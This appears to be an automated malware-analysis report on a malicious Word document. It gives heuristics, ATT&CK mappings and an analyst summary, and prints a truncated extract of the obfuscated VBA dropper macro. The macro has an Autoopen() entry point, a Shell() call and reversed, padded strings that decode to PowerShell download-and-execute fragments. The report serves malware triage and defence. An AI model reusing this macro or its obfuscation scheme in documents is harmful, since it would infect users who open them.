Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The OLE_VBA_SHELL and OLE_VBA_AUTOOPEN heuristics indicate that the macro runs automatically when the document is opened (the preview shows an Autoopen() entry point guarded by On Error Resume Next) and that it is built to execute commands via Shell(). The carved macros.bas artifact is the decoded VBA source produced by olevba, not a file shipped inside the sample; it confirms the macro content. The macro's likely intent is to download and execute a second-stage payload, a common dropper behaviour: Autoopen() calls falAJEHG() with an argument assembled from ZHlGMZQEcZWrvj(), which in turn builds strings through the helper WZzEj(). The two string literals visible in the preview are reversed and padded with recurring junk tokens (rU5, ebp, GgS, TU0 and a spliced '+'); once those are stripped and the text reversed they read as fragments such as Invoke-Item, DoWnlOadFIle and (vaRIaBLe *Mdr*).NAme[3,11,2]-JoIn, idioms typical of obfuscated PowerShell loaders. Almost everything else in the module is arithmetic noise assigned to unused variables; it only survives because On Error Resume Next swallows the division-by-zero errors the empty operands would otherwise raise. Caveats: the decoder WZzEj() and the call target falAJEHG() fall outside the 1,000-line preview, and the only URL extracted is the drawingml schema namespace, so the second-stage location is unconfirmed. The OLE_LEGACY_WORDBASIC_AUTOEXEC finding keys on the AutoOpen marker alone, and its description of "no modern VBA project recovered" is contradicted by the extracted macros.bas, so treat it as corroboration of the AutoOpen finding rather than an independent signal.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6546883-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6546883-0
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 154429 bytes |

SHA-256: 2e9f349833ae9e7c14fc0931c62c3edcc836996f54de8d0b287037bec8bb2f0d

Preview script: first 1,000 lines of the extracted script (the copy below is itself truncated)
Attribute VB_Name = "zQbYtKimGHzYRY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ZBKaG(JzrUj)
TmoRTJ = jFUrRK
hcdmO = (KFwsLN / ofONMW / 40865 / Fix(zYFAY)) + 20285 - CLng(PFKsPE + CLng(76841)) + TEGqoO + 78004 * FFSAEr - CStr(13936) / vpwkDX / CLng(qhjpsh)
End Sub
Sub zmAwv(GfjrJ)
AvFJZY = jzaHDd
TQIIYv = (mHfAG / wXPIEb / 51421 / Fix(qkYGR)) + 90003 - CLng(VWfwU + CLng(499)) + qWXTNP + 26593 * aJTczI - CStr(65671) / CcCXc / CLng(kCGAMQ)
ADlvJj = llNLJD
Ompvs = (EcUScM / mUMMC / 94606 / Fix(ZGhhp)) + 53703 - CLng(jQOqNZ + CLng(40540)) + PRFTc + 62361 * jTSwV - CStr(12031) / ZBIMA / CLng(IFHFQz)
LFbOm = PFuHjU
BXOOs = (jQqNi / YkNKJ / 99359 / Fix(fIMdr)) + 7228 - CLng(fqLft + CLng(48617)) + fjlqtM + 20531 * HUrtN - CStr(27288) / BukHj / CLng(NotWKi)
End Sub
Sub tFLUII(AcTQmr)
Brmwq = ZoQvms
RusUi = (kVBJXk / UFZbU / 39910 / Fix(YLzGXU)) + 75085 - CLng(EpQhQ + CLng(11133)) + FkzhIH + 91785 * hPOlb - CStr(39011) / paRDi / CLng(zlwNq)
QMtpTz = zocmLh
LPrJjL = (oApQNb / IwCTR / 47227 / Fix(noZumi)) + 39611 - CLng(NoFWCu + CLng(65534)) + nifCcM + 8732 * GYXrp - CStr(49522) / tIzXb / CLng(PzdLN)
End Sub
Sub Autoopen()
On Error Resume Next
AKqYaa = OpmVC
jAnOLd = (nVLNEX / bYjCq / 27283 / Fix(DOQzw)) + 33363 - CLng(KdHmuv + CLng(83884)) + bjRic + 99445 * zdUDTd - CStr(82022) / kfoCf / CLng(XPOLAc)
falAJEHG (EaJbPK + ZHlGMZQEcZWrvj + zkHlZZ)
mitwH = UWHGt
fDUCX = (XmuCLc / StLzX / 6205 / Fix(GWkkVN)) + 86235 - CLng(XhTDi + CLng(6255)) + scikJC + 74770 * kTQto - CStr(50569) / WkCPF / CLng(TjjJj)
End Sub
Sub ONiHu(nBiRm)
bTCzRF = DiNKj
SzVZt = (bZnYH / LWtBZ / 53175 / Fix(zIolH)) + 37400 - CLng(bpfjB + CLng(4935)) + GbDSbp + 31654 * Uovuw - CStr(10071) / aCImFm / CLng(iLOFaZ)
uGWECF = pizmol
AqMVNs = (cXPzN / zrDVO / 81913 / Fix(ZhYpv)) + 263 - CLng(kTLzQA + CLng(5544)) + VCkMhX + 33811 * HHpqzw - CStr(60774) / XwMPSR / CLng(ZNEdJ)
PjMMS = AlBJC
wQiGK = (mojbSo / LDfKzc / 87050 / Fix(Wsbcd)) + 59220 - CLng(iqWoJH + CLng(38614)) + oTDOr + 40322 * nNYYHS - CStr(40502) / ChJzcY / CLng(djLJJ)
End Sub
Sub FiijrC(rwNBnt)
NEFXK = QUHAH
dhpWDi = (kijts / PdjFT / 14680 / Fix(iTsZb)) + 76392 - CLng(zclWiY + CLng(99546)) + JBZKT + 54003 * ViKNI - CStr(90397) / hOnsvJ / CLng(oQvPj)
End Sub
Attribute VB_Name = "IzMPTPqT"
Sub jJojZw(PNfDT)
WjldqQ = ldujQ
YRuus = (MziiE / jLaAi / 69426 / Fix(rNaddp)) + 48037 - CLng(wwCOET + CLng(47657)) + wUTmw + 13931 * oFhRHF - CStr(88997) / vKDZnz / CLng(QETiOD)
End Sub
Function ZHlGMZQEcZWrvj()
On Error Resume Next
PzsKli = OzhkSm
wXRVE = (HDBuk / HEPTUt / 83829 / Fix(phZwT)) + 30332 - CLng(jNWoV + CLng(21248)) + UjCJK + 83591 * LwzZI - CStr(43929) / ziMrad / CLng(PwUBoH)
htCiTZ = wqdqv
dCipip = (IGiTq / aipHE / 1527 / Fix(LuMKf)) + 78620 - CLng(sdsOr + CLng(16879)) + FziAz + 63856 * qaLirR - CStr(97889) / GjZqhT / CLng(pXKqQP)
jfUjd = WZzEj("vTKrU5jbo-webp+e'+'bperU5+rU5erU5+rU5bp+ebpn'+'ebr'+'U5+rU5prU5+rU5'+'(& = dsarU5+rU5dasnt7TrU5(( )rU5rU5nIoJ-]2,11,3[emAN.)rU5*rdM*r'+'U5 eLBaIRav(( . '(NGYv7", 84730 + 6 - 84730, 84730 + 151 - 84730)
NTciiU = LGETZU
BcnXZ = (WJpBb / WJGqJ / 31346 / Fix(LMsFJ)) + 76104 - CLng(EvdVWI + CLng(96782)) + ovXSr + 12464 * EdbGZ - CStr(96044) / EPuDA / CLng(HIWdj)
izQWpa = HmjTNf
wGQlcA = (LGWvzQ / QpLKZZ / 74622 / Fix(BWVkjs)) + 5226 - CLng(FuwlZ + CLng(54978)) + vnvAXq + 88068 * pKzqwU - CStr(18387) / GsIEtP / CLng(RwIARB)
TmYYdwc = WZzEj("0t;)rU5+rU5CDSt7TrU5+rU5()ebpmetI-e'+'ebp+ebpkebp+rU5+rU5ebpovnIebp(rU5+rU5&;)CDSt7rU5+rU5T ,rU5+'+'rU5)rU5+rU5(TU0gNGgSiGgrU5+rU5SrtSoTTU0.cfsarU5+rU5t7T(TU0elGgSIFdrU5+rU5aOGgSlnWGgSoDTrU5+9zL6Z8", 91843 + 7 - 91843, 91843 + 189 - 91843)
fKoBQ = iYPwH
jamCGl = (FssQYu / viEOpc / 47575 / Fix(imCvEn)) + 20032 - CLng(dMwzjR + CLng(59461)) + CPUwJm + 88837 * GkazU - CStr(867) / fXsvz / CLng(KjJvKO)
YtfbRX = VUOQCn
imjmju = (naTjk / Prijb / 88051 / Fix(aQrdrw)) + 66664 - CLng(Xh
... (truncated)